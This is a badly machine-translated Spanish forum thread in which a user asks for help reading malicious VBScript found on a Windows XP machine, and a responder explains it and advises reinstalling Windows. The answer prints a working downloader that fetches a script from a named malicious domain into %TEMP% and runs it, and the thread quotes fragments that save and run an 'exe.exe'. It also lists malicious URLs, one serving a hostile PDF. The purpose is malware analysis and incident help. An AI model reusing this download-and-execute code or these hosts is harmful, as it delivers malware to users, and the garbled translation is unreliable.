Cuestión : Podría un experto intentar por favor interpretar este código de VBS

Hola el amigo del experts

A ha estado viendo un cierto comportamiento inusual con su computadora de Windows Xp SP3 IE7 sobre los últimos pares de los días de los cuales soy profundamente sospechoso.  Observé que él que sucede sobre una conexión de VNC apenas que una ventana del breve periodo de tiempo ago.

A CMD.EXE surge y el archivo de waits.
A VBS se abre obviamente en libreta de Notepad.
When es cerrado, la ventana closes.

I de CMD bastante sure que esto es una escritura malévola que intenta funcionar el archivo de VBS sin especificar el programa (CScript o WScript) para funcionarlo, y porque he fijado la acción del defecto para la mayoría del tipo tipos de la “escritura” de archivo a “corrijo” la acción (libreta) algo que el “abierto” (ejecutar la escritura), la actividad malévola es probablemente failing.

On la primera ocasión que no atestigüé, el archivo “yb.vbs” fue abierto en libreta de la carpeta del %TEMP% del usuario con el contenido siguiente: class= " lineNumbers " >
1 del >

B= codeBody " yb.vbs " del " prettyprint " del class= del id= " codeSnippet800241 " del >


I transfirió con seguridad “el nofollow " del” rel= del _blank " del” target=” de http://jyiop.com/kr/yb.vbs del href= " del el s de http://jyiop.com/kr/yb.vb” y consideró que el contenido “fue ofuscado crudo” invirtiendo algunos de los parámetros como se muestra abajo: class= " lineNumbers " >
1 del >

w=3000 del id= " codeSnippet800242 " del >


I transfirió con seguridad “el nofollow referido " del” rel= del _blank " del” target=” de http://jyiop.com/kr/hy/_q.php del href= " del el .php de http://jyiop.com/kr/hy/_q” para revelar este código: class= " lineNumbers " >
1 del >

el class= >

I de
excepto blanco como > excepto como el archivo de *.htm del mismo nombre) y con el código apropiado, de modo que pueda apenas estar la respuesta del servidor a mi tentativa de transferir el file.

Assuming el Relative URL compara:  rel= " nofollow " del " _blank " del target= de " http://jyiop.com/kr/_yoyk.php " del href= del http://jyiop.com/kr/_yoyk. el php
then que resuelve al rel= " nofollow " del " _blank " del target= de " http://www.google.com " del href= del http://www.google.com
I que prueba esto en mi propio sistema con el rel= " nofollow " del " _blank " del target= de " http://www.google.co.uk " del href= del http://www.google.co.uk como el Home Page, así que yo sabemos que apenas no está volviendo a dirigir a mi

On del Home Page. la ocasión subsecuente que atestigüé sobre VNC que un comando fue publicado obviamente de funcionar el archivo “uor.vbs” de la carpeta del %TEMP% del usuario en una ventana del comando, y el cuaderno hizo estallar para arriba conteniendo la escritura: class= " lineNumbers " >
1 del >

B= codeBody " uor.vbs " del " prettyprint " del class= del id= " codeSnippet800244 " del >
 el bs de http://ypuii.com/k_/uor.v” en un editor de textos reveló iguales que antes, IE. strings.

Now, he encontrado que “GetSpecialFolder (2)” refiere a la carpeta del %TEMP% del usuario, y puedo ver que la escritura está transfiriendo el archivo de VBS, creando un VBScript en marcha concatenando secuencias y secuencias invertidas, pero soy inseguro de exactamente cuál una escritura como esto es que hace o que intenta a do.

I no muy entendido con VBS con excepción de un cierto uso básico, así que las referencias siguientes son un rompecabezas a mí:

maertS.BDODA = ADOBD.Stream

c.open OT, a, z:
If de c.send () c.Status = x Then
u=c.ResponseBody: d.Open: d.Type = y: d.Write u: d.SaveToFile b: d.Close


I puede ver tan claramente como día que Windows Media Player se está matando apagado si está funcionando (que no era en los tiempos materiales), pero me pregunto porqué una escritura estaría haciendo la otra edición al parecer significativa de this.

One es que descubrí “un URL recientemente mecanografiado” en la lista drop-down de la barra de la dirección del IE del usuario: el rel= " nofollow " del” _blank” del target= de " http://ypuii.com/k_/zcus/efmjcg.pdf” del href= del
el fmjcg.pdf
I de http://ypuii.com/k_/zcus/e no podría encontrar que el archivo depositado dondequiera en la computadora y ella del usuario no puede incluso recordar cuando ella tendría pasado abrió un archivo del pdf en su hojeador.  Salvé ese archivo del pdf y, en la inspección en un editor de textos, puedo ver un cierto contenido del texto como cierta clase de código con guión y de una referencia al “Javascript”.  Lo que sigue está también claro en un editor de textos:

/Author (yZ=ssA f V)
/gZ de MllZTgg (. s_JUNCVZa #8l=z 96yp2x de b LPD tv/-Xqrf4dY3M: ¿ihwBQn E K7gATGe H de S5Rm k o el 0&uFOcj%?
/Title (qgMpr#AZMZH de I1W) del Ng JGgG?)
/ModDate (D del
/Creator (Kotefekjoesito) del
/Keywords (Mokomeuapaualimajsi): 20100621095906) el

Googling del
/Producer (820d5Deawohigejoxamogoga) apenas el “creador Kotefekjoesito” conocido “” me lleva a esta página: ¿rel= " nofollow " del” _blank” del target= de " http://jsunpack.jeek.org/dec/go?report=c4cc162b45e937762035f286406a989f2adf2753” del href= del
ec/go de http://jsunpack.jeek.org/d? el report=c4cc162b45e937762035f286406a989f2adf2753
where demuestra claramente que el archivo es Malicious.

I puede conjeturar solamente que la referencia anterior en el VBScript a “ADOBD.Stream” es una referencia a “Adobe”, y a una corriente en un archivo malévolo hecho a mano del pdf.  Puedo asumir solamente que éste era o el comienzo de la edición, o que era un archivo trajo por una escritura malévola, pero no habría pensado que habría agregado el URL a la lista recientemente mecanografiada del URL.  Eso está desconcertando en itself.

Probably no que una coincidencia es que el StrReverse googling () de “maertS.BDODA " también me lleva “al sitio del de http://jsunpack.jeek.org del nofollow " del” rel= del _blank " del” target=” de http://jsunpack.jeek.org del href= " del " con esta página: ¿rel= " nofollow " del” _blank” del target= de " http://jsunpack.jeek.org/dec/go?report=5d7727607489f01840f34855c5664e662488962e” del href= del
ec/go de http://jsunpack.jeek.org/d? report=5d7727607489f01840f34855c5664e662488962e
but que no dice que que es malicious.

Could alguien satisfacer me aconsejan cuál esa primera escritura es probable haber hecho (o haber intentado para hacer) en la computadora del usuario.  Quisiera saber dónde me coloco, porque una exploración completa del antivirus + de RootKit del sistema no ha rendido ningún resultado positivo y no puedo ver ninguna referencias a los archivos de VBS en el

Bill
de registry.

Thanks por adelantado class= del

Respuesta : Podría un experto intentar por favor interpretar este código de VBS

No estoy dispuesto a ir hasta la apertura de los Web site que usted mencionó sin embargo, de las escrituras arriba aquí soy lo que veo…

La escritura 1 está creando un archivo en blanco, acoplamientos a un Web site y a las transferencias directas el contenido de la página y descargas él en el archivo en blanco.  Este archivo se salva como “yb.vbs” y se supone ejecutar.
-------------------------------------------------------------------
B= " yb.vbs "
Con CreateObject (“MSXML2.XMLHTTP”)
      .open “CONSIGUEN”, “http://jyiop.com/kr/yb.vbs”, falso
      .send ()
      Fijar A = CreateObject (“Scripting.FileSystemObject”)
      Fijar D = A.CreateTextFile (A.GetSpecialFolder (2) + “\” + B)
      D.WriteLine .responseText
Extremo con
D.Close
CreateObject (“WScript.Shell”). Funcionar A.GetSpecialFolder (2) +” \ “+ B
-------------------------------------------------------------------
El paso 2 ahora que se ha creado el archivo de los vbs y funcionamiento, intenta visitar otro Web page pero este vez ahorra el contenido del Web page en un archivo llamado “exe.exe”.  Este nuevo archivo debe ser ahorrado en la carpeta del temp de los usuarios.
La escritura entonces funciona el archivo “exe.exe”.
¡Como usted mencionó, el taskkill para Windows Media Player - porqué, que sabe?!?!
La escritura entonces suprime la escritura del vb que el paso 1 creó (la escritura que está funcionando actual).
Hay una segundo espera 3 entonces que el archivo “exe.exe” se suprime.

Esta parte;
[maertS.BDODA = ADOBD.Stream
c.open OT, a, z: c.send ()
Si c.Status = x después
u=c.ResponseBody: d.Open: d.Type = y: d.Write u: d.SaveToFile b: d.Close]
es la escritura que mecanografía para abrir un archivo que fluya en el Web page - nada hacer con Adobe.  “c.Status” - la escritura está esperando el Web page para ser lista y cabida para transferir. “u=c.ResponseBody” toma el Web page y lo empuja en una variable.  Se abre la corriente y el texto se transfiere en la variable.  Se salva y se cierra el archivo.  En esta escritura el Web page/el archivo se salva en la carpeta del temp como “exe.exe”.

El peligro verdadero es que archivo de “exe.exe”.  Una vez que se ha funcionado, no se sabe qué fue diseñada para hacer.

Esa computadora todavía se infecta con un virus.  El programa “exe.exe” habría podido transferir otros virus en el fondo para impedir las exploraciones del sistema.  El hecho de que usted pueda ver la ventana del comando abierta y la escritura se intenta para funcionar me dice que hay algún archivo malévolo todavía que se retrasa.

Puede ser hora de evaluar qué necesidades de ser ahorrado de esa máquina y comenzar de nuevo con una reinstalación de Windows y de los usos.  Suena dramático pero viendo como el antivirus no está detectando cualquier cosa fuera de clases yo pensar que usted está actualmente ninguna vuelta.  Recordar eso mientras el código malévolo esté prendido allí, cualquiera conducen; sea el palillo de la memoria del USB, la cámara etc., puede potencialmente contener al virus/al Trojan, si fue atado a la máquina.
Otras soluciones  

 
programming4us programming4us